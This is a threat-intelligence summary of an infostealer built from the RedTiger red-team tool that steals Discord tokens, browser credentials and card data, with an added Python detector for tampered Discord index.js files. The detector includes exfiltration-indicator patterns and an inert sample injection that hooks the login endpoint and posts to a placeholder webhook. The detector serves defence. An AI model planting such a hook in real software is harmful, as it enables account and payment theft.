Full Report
Attackers are using the open-source red-team tool RedTiger to build an infostealer that collects Discord account data and payment information. [...]
Analysis Summary
# Hackers steal Discord accounts with RedTiger-based infostealer
Hackers are using the open-source red-team tool RedTiger to build an infostealer that collects Discord account data and payment information, as well as credentials stored in browsers, cryptocurrency wallet data, and game accounts.
## Key Points
- Attackers use RedTiger's info-stealer component to build a stealer that, in the observed campaign, targets French Discord account holders.
- The malware scans for Discord and browser database files, extracts account tokens, and injects JavaScript into the Discord desktop client's index.js so that the client's own API calls can be intercepted; because that file is loaded on every client start, the hook persists until the client is reinstalled.
- The malware also harvests browser-saved passwords, cookies, browsing history and stored credit-card data, and takes desktop screenshots.
- The resulting stealers are distributed through various channels, including Discord servers, malicious software download sites, forum posts, malvertising, and YouTube videos.
## Threat Actors
- No attribution available in the article.
## TTPs
- Use of RedTiger's info-stealer component to build a targeted stealer rather than writing one from scratch.
- Injection of JavaScript into the Discord desktop client's index.js to intercept the client's API calls.
- Harvesting of browser-saved passwords, cookies, history and credit-card data, plus desktop screenshots.
- Anti-sandbox and anti-analysis checks intended to stop the sample from running in analysis environments.
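The index.js injection named in the key points and in the TTP list above, seen from the defender's side: an added example, not code from the article or from RedTiger, that checks the Discord desktop client's discord_desktop_core/index.js against its stock single-line content and flags assumed indicator strings (a hard-coded webhook, outbound fetch, hooks on auth or billing endpoints). The Windows path layout, the indicator patterns and the three sample file contents are all assumptions chosen for illustration; the webhook URL in the sample is a placeholder.

```python
"""Added example (not RedTiger's code and not from the article): an integrity
check for the Discord desktop client's discord_desktop_core/index.js, the file
the article says the stealer injects JavaScript into.

The unmodified file is a single line that loads core.asar, so any extra content
is at least a modification; the INDICATORS below are assumed, illustrative
patterns that point at exfiltration or API hooking, not a definitive signature.
"""
import os
import re
from pathlib import Path

# Content of an unmodified discord_desktop_core/index.js.
STOCK_INDEX_JS = "module.exports = require('./core.asar');"

# Assumed indicators of injected code (illustrative, not exhaustive).
INDICATORS = {
    # Hard-coded Discord webhook used as an exfiltration channel.
    "webhook_exfil": re.compile(r"discord(?:app)?\.com/api/webhooks/\d+/[\w-]+", re.I),
    # Outbound HTTP from a file that has no reason to make requests.
    "remote_fetch": re.compile(r"\b(?:fetch|https\.request)\s*\(", re.I),
    # Hooks on the client's own auth/account/billing endpoints.
    "api_hook": re.compile(r"/api/v\d+/(?:auth/login|users/@me|billing)", re.I),
    # The Discord token regex that stealers embed to validate harvested tokens.
    "token_regex_literal": re.compile(r"\[\\w-\]\{24"),
}


def analyze_index_js(content: str) -> dict:
    """Return modification status, matched indicators and a verdict for one index.js."""
    lines = [ln.strip() for ln in content.splitlines() if ln.strip()]
    modified = lines != [STOCK_INDEX_JS]
    matched = [name for name, rx in INDICATORS.items() if rx.search(content)]
    if not modified:
        verdict = "clean"
    elif matched:
        verdict = "likely_injected"
    else:
        # Extra lines without exfil indicators: could be a client mod; review manually.
        verdict = "modified"
    return {"modified": modified, "indicators": matched, "verdict": verdict}


def scan_discord_install(appdata: Path) -> dict:
    """Analyze every index.js under the assumed Windows layout
    %APPDATA%\\discord\\<version>\\modules\\discord_desktop_core-<n>\\discord_desktop_core\\index.js.
    Returns {path: result}; empty if Discord is not installed there."""
    pattern = "discord/*/modules/discord_desktop_core-*/discord_desktop_core/index.js"
    return {
        str(p): analyze_index_js(p.read_text(encoding="utf-8", errors="replace"))
        for p in sorted(appdata.glob(pattern))
    }


# Constructed samples (not real files; the webhook URL is a placeholder).
CLEAN_SAMPLE = "module.exports = require('./core.asar');\n"

# Inert sketch of what an injected file looks like: the stock line kept so the
# client still works, a webhook, and a hook on the login endpoint.
INJECTED_SAMPLE = """module.exports = require('./core.asar');
const WEBHOOK = 'https://discord.com/api/webhooks/000000000000000000/PLACEHOLDER_NOT_A_REAL_HOOK';
const origOpen = XMLHttpRequest.prototype.open;
XMLHttpRequest.prototype.open = function (method, url) {
  if (String(url).includes('/api/v9/auth/login')) { fetch(WEBHOOK, { method: 'POST' }); }
  return origOpen.apply(this, arguments);
};
"""

# A hypothetical client mod adds a require() but no network code: modified, not injected.
MODIFIED_SAMPLE = """require('./hypothetical_client_mod.asar');
module.exports = require('./core.asar');
"""

if __name__ == "__main__":
    for name, sample in [("clean", CLEAN_SAMPLE), ("injected", INJECTED_SAMPLE),
                         ("modified", MODIFIED_SAMPLE)]:
        print(name, analyze_index_js(sample))
    appdata = os.environ.get("APPDATA")  # only meaningful on Windows
    if appdata:
        for path, result in scan_discord_install(Path(appdata)).items():
            print(path, result)
```

A "modified" verdict is not proof of compromise (legitimate client mods also edit this file), but on a machine where no such mod was installed, any content beyond the stock line is the cue to replace the file by reinstalling the client and then rotating the account credentials.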
## Affected Systems
- Windows and Linux systems.
- Discord accounts and browser databases.
## Mitigations
- Do not download executables or game tools from unverified sources.
- If compromise is suspected, change the Discord password immediately (this invalidates the account's existing session tokens), log out all other devices, and reinstall the Discord desktop client so that any injected index.js is replaced.
- Enable MFA on every account that supports it, and stop relying on the browser to store passwords and card data; clear what is already saved.
- Use a reputable security suite to detect and block malicious activity.
## Conclusion
The use of RedTiger-based infostealers poses a significant threat to users' sensitive information, particularly in the gaming and Discord communities. Users must be cautious when downloading files or using unverified software, and take immediate action to protect themselves if they suspect compromise.